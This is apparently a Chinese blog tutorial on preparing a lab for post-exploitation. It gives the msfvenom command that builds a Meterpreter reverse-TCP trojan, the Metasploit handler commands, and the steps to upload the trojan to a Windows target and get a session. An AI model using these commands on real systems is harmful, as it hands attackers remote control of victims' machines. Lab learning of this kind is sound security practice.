后渗透阶之环境准备(1)

环境介绍:

主机1:windows10(x64)(ip:192.128.2.129)

主机2: kali(ip:192.168.2.128)

前期环境准备:
使用kalimsfoven生成木马程序

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.128 lport=4444 -f exe > msf.exe

后渗透阶之环境准备(1)_第1张图片

 开启msfconsole

后渗透阶之环境准备(1)_第2张图片

 使用exploit/multi/handler模块,设置payload并开启监听

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.2.128
lhost => 192.168.2.128
msf6 exploit(multi/handler) > set lport 4444
lport => 4444


后渗透阶之环境准备(1)_第3张图片

将木马文件上传到windows靶机

后渗透阶之环境准备(1)_第4张图片

kaii开始监听

exploit

后渗透阶之环境准备(1)_第5张图片

 使用ls查看靶机文件,确定连接到靶机后渗透阶之环境准备(1)_第6张图片

你可能感兴趣的:(渗透测试,大数据)